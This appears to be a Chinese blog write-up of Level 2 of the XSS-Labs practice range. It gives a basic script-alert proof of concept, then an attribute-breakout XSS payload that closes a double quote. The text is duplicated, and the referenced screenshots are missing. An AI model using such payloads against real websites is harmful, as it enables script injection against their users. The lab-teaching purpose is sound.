读者可参考、订阅专栏:Xss-Labs靶场攻防实战
正文
POC:
<script>alert("qiushuo")</script>
回显如下:

查看页面源代码,发现特殊字符被转义:

逻辑后端源码:

通过阅读源代码可知,闭合双引号即可实现XSS:
"><script>alert("qiushuo")</script><"

本文详细解析了在Xss-Labs靶场中的Level-2攻防实战,介绍了利用POC进行攻击并注意到特殊字符转义的问题,承诺后续将分享Level-3解题内容。作者秋说分享了网络安全知识。
读者可参考、订阅专栏:Xss-Labs靶场攻防实战
POC:
<script>alert("qiushuo")</script>
回显如下:

查看页面源代码,发现特殊字符被转义:

逻辑后端源码:

通过阅读源代码可知,闭合双引号即可实现XSS:
"><script>alert("qiushuo")</script><"


被折叠的 条评论
为什么被折叠?